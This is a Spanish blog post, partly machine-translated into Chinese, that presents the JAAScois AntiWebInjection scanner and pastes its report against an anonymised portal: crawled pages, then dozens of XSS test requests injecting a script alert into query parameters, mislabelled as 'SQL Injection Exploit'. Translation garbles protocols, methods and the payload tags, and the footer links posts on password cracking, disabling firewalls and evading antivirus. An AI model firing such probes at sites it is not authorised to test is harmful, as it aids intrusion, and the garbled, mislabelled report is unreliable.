JAAScois AntiWebInjection

打印友好, PDF & Email

Este programa es muy sencillo de usar, primero lo descargamos de 这里 o de su web oficial. Nos saca todas las webs y archivos que tiene un sitio web, y en ellos busca contraseñas o fallos, es super rapido y muy útil si quieres ver el contenido total de un sitio web.

Una vez instalado, simplemente lo ejecutamos y ponemos el sitio web a ‘investigar’, empezamos el escaneo y al finalizar nos sacará un report en un documento de texto como este (这里):

Pages:
HTTP 协议://www.XXXXXX.com/portal/default.aspx
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx
HTTP 协议://www.XXXXXX.com/portal/portal.css
HTTP 协议://www.XXXXXX.com/portal/admin/cambiarClave.aspx
HTTP 协议://www.XXXXXX.com/portal
HTTP 协议://www.XXXXXX.com/portal/Docs/Docs.htm
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?HacerLogin=1
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=1&tabid=42
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=2&tabid=37
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=3&tabid=68
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=4&tabid=39
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=5&tabid=41
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=6&tabid=46
HTTP 协议://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=4&ModuleID=94
HTTP 协议://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=5&ModuleID=94
HTTP 协议://www.XXXXXX.com/portal/Uploads/SolucionRPS/Campaña
HTTP 协议://www.XXXXXX.com/portal/
HTTP 协议://www.XXXXXX.com/portal/Docs/style.css
HTTP 协议://www.XXXXXX.com/portal/RPSModules/WebRecordarContrasenna.aspx
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=1&tabid=42&HacerLogin=1
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=0&tabid=9
HTTP 协议://www.XXXXXX.com/portal/Uploads/Clientes/VirreyExito.pdf
HTTP 协议://www.XXXXXX.com/portal/Uploads/Clientes/Casos
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=2&tabid=37&HacerLogin=1
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=3&tabid=68&HacerLogin=1
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=4&tabid=39&HacerLogin=1
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=5&tabid=41&HacerLogin=1
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=6&tabid=46&HacerLogin=1
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=0&tabid=9&HacerLogin=1

=>=>=>=>
Exploits:
SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?HacerLogin=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=1&tabid=42<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=2&tabid=37<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=3&tabid=68<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=4&tabid=39<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=5&tabid=41<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=6&tabid=46<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=4&ModuleID=94<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=5&ModuleID=94<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

may be upload page
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/Uploads/SolucionRPS/Campaña
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=1&tabid=42&HacerLogin=1<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=0&tabid=9<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

may be upload page
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/Uploads/Clientes/VirreyExito.pdf
More Info: HTTP 协议://www.jaascois.com

may be upload page
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/Uploads/Clientes/Casos
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=2&tabid=37&HacerLogin=1<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=3&tabid=68&HacerLogin=1<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=4&tabid=39&HacerLogin=1<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=5&tabid=41&HacerLogin=1<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=6&tabid=46&HacerLogin=1<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

Error 404 page not found
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/Uploads/SolucionRPS/Campaña
More Info: HTTP 协议://www.jaascois.com

Error 404 page not found
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/Docs/style.css
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

SQL Injection Exploit
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=0&tabid=9&HacerLogin=1<脚本>警报(‘hacking%20xss’)</脚本>
More Info: HTTP 协议://www.jaascois.com

Error 404 page not found
Req: 获取
HTTP 协议://www.XXXXXX.com/portal/Uploads/Clientes/Casos
More Info: HTTP 协议://www.jaascois.com


推荐文章

使用 Brutus - 密码破解程序
使用 VBscript 或通过编辑注册表停止 Windows XP 防火墙
肮脏但有效, 您对其进行编程, 你编译它, 防病毒软件没有检测到它,每个人都很高兴 ;)
使用 Sankey 在 Grafana 中利用 Elasticsearch 可视化

作者

赫克托·埃雷罗 
nheobug@bujarra.com
Autor del blog Bujarra.com Cualquier necesidad que tengas, 请随时与我联系, 我会尽我所能帮助你, 分享就是生活 ;) . 享受文档!!!

在 Microsoft Windows 上配置 iSCSI

21 十月 2008

使用 WinRAR 制作 Joiner 或 Splitter 或 Binder

21 十月 2008